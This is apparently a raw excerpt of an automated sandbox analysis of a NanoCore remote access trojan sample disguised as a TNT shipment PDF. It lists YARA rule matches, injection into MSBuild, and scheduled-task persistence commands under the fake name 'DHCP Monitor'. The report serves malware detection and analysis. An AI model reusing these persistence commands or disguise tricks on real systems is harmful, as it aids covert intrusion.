      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A64ACF1_2_00A64ACF
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A653DB1_2_00A653DB
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A65C451_2_00A65C45
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A64FC31_2_00A64FC3
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A58F0B1_2_00A58F0B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0541E4713_2_0541E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0541E4803_2_0541E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0541BBD43_2_0541BBD4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_06A700403_2_06A70040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_006C5CF98_2_006C5CF9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_006C18C08_2_006C18C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_006C21488_2_006C2148
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_006C4A208_2_006C4A20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_006C21338_2_006C2133
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E3585812_2_02E35858
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E3458012_2_02E34580
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E3214812_2_02E32148
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E31A4012_2_02E31A40
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02E3213312_2_02E32133
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: String function: 00A54E1D appears 36 times
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: String function: 00A554B0 appears 58 times
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dhcpmon.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE, 00000001.00000003.653347801.000000001BEBF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.1047272619.00000000064F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.1047272619.00000000064F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.MSBuild.exe.64f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.MSBuild.exe.64f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: dhcpmon.exe.3.dr, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
      Source: dhcpmon.exe.3.dr, Microsoft.Build/BackEnd/TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
      Source: dhcpmon.exe.3.dr, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.csTask registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: dhcpmon.exe.3.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: dhcpmon.exe.3.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: dhcpmon.exe.3.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: dhcpmon.exe.3.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
      Source: dhcpmon.exe.3.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 3.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.0.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
      Source: 12.2.dhcpmon.exe.c70000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 15.0.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
      Source: dhcpmon.exe, dhcpmon.exe.3.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
      Source: dhcpmon.exe, 0000000F.00000002.684375210.0000000002381000.00000004.00000001.sdmpBinary or memory string: *.slnP#"l
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
      Source: dhcpmon.exe, 0000000F.00000002.684375210.0000000002381000.00000004.00000001.sdmpBinary or memory string: l)C:\Program Files (x86)\DHCP Monitor\*.sln
      Source: dhcpmon.exe, dhcpmon.exe.3.drBinary or memory string: *.sln
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: /ignoreprojectextensions:.sln
      Source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
      Source: classification engineClassification label: mal100.troj.evad.winEXE@16/11@26/2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c536defd-5b4b-4102-b411-7da22a027e3a}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\tmp731A.tmpJump to behavior
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEMetadefender: Detection: 18%
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEReversingLabs: Detection: 59%
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEFile read: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE'
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7609.tmp'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 0
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
